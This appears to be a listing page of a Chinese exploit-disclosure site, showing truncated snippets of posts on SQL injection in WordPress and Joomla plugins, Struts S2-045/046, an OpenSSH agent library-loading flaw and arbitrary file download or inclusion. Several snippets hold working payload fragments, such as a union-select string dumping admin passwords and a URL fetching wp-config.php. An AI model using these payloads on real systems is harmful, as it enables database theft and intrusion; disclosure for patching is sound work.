当前分类

漏洞公布

WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The get oarameter 'kc_ad' is vulnerable. 2. Proof of conc...

S2-046 PoC

POST /doUpload.action HTTP/1.1 Host: localhost:8080 Content-Length: 10000000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z Connection: close ------WebKitFormBoundaryAnmUg...

Fiyo CMS 2.0.6.1 权限提升漏洞

# Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1 # Google Dork: no # Date: 11-03-2017 # Exploit Author: @rungga_reksya, @dvnrcy # Vendor Homepage: http://www.f...

st2-045测试工具

相信有不少运维朋友又要加班加点的打补丁了。 本工具仅用作探测自有资产是否存在该漏洞,请勿用于其他用途,否则后果自负。 测试工具: st2-045ihonker专版 修复意见: 升级st2框架

MySQL文件上传-ID参数SQL注入

SQL Injection/Exploit : # http://localhost/[PATH]/download.php?id=[SQL]&t=files # -9999'+/*!50000union*/+select+1,concat_ws(un,0x3c62723e,0x3c62723e,pw),3,4,5,6+from+admin-- -&t=files # http://localhost/[P...

Joomla Calendar Component SQL注入

POC: http://[Site]/index.php?option=com_blog_calendar&modid=['SQLi]

OpenSSH 7.4代理协议任意库加载漏洞

CVE-2016-10009 $ cat evil_lib.c #include <stdlib.h> __attribute__((constructor)) static void run(void) { // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH, // prevent recursion through s...

Joomla com_jsjobs SQL注入漏洞

Exp: http://127.0.0.1/index.php?option=com_jsjobs&c=jsjobs&view=employer&layout=view_job&vj=2&oi=680'

WordPress强制下载任意文件下载漏洞

###################### # PoC ###################### # [+] Using `force-download.php` file from `Wordpress websites we can download any file. # # [!] http://ihonker.org/force-download.php?file=wp-config.php # ##...

WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞

WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability. <html> <body> <form action="http://<target>/wp-admin/admin-ajax.php" meth...

12345...24

插入图片
返回顶部